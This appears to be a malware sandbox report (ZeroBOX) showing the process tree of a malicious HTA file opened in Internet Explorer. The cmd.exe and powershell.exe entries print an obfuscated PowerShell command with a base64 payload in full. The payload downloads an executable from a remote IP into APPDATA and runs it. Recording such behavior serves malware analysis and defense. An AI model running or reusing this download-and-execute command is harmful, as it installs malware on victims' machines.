| ZeroBOX

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\107.hta.html
2032
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2032 CREDAT:145409
  1376
  - cmd.exe "C:\Windows\system32\cmd.exe" "/C POwERsheLl -Ex BypasS -NoP -W 1 -c dEViceCRedENtialDEpLoymeNT ; iEX($(iEX('[SYSTEm.TExt.encoding]'+[CHaR]0X3a+[cHAr]0X3a+'uTF8.GETstRiNg([SYsteM.conVERt]'+[ChAR]58+[Char]0X3A+'FromBasE64sTRiNg('+[CHaR]0x22+'JHNUam1TTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1CZXJkRWZJbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExId2osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5aVCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc05zY0lsYmYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjVUdNWHJlc3ZwLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOUEhmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJkb2VCZ21nWSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVTUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c2xoemFZWVlTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHNUam1TTTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvMTA3L3NhaG9zdC5leGUiLCIkRW5WOkFQUERBVEFcc2Fob3N0LmV4ZSIsMCwwKTtzVGFSVC1TbGVlUCgzKTtzVEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXHNhaG9zdC5leGUi'+[CHaR]0x22+'))')))"
    1720
    - powershell.exe POwERsheLl -Ex BypasS -NoP -W 1 -c dEViceCRedENtialDEpLoymeNT ; iEX($(iEX('[SYSTEm.TExt.encoding]'+[CHaR]0X3a+[cHAr]0X3a+'uTF8.GETstRiNg([SYsteM.conVERt]'+[ChAR]58+[Char]0X3A+'FromBasE64sTRiNg('+[CHaR]0x22+'JHNUam1TTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1CZXJkRWZJbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExId2osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5aVCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc05zY0lsYmYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjVUdNWHJlc3ZwLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOUEhmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJkb2VCZ21nWSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVTUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c2xoemFZWVlTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHNUam1TTTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvMTA3L3NhaG9zdC5leGUiLCIkRW5WOkFQUERBVEFcc2Fob3N0LmV4ZSIsMCwwKTtzVGFSVC1TbGVlUCgzKTtzVEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXHNhaG9zdC5leGUi'+[CHaR]0x22+'))')))"
      1560
      - csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\btoc9-wy.cmdline"
        2444
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES3D8D.tmp" "c:\Users\test22\AppData\Local\Temp\CSC3D1E.tmp"
        2240

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents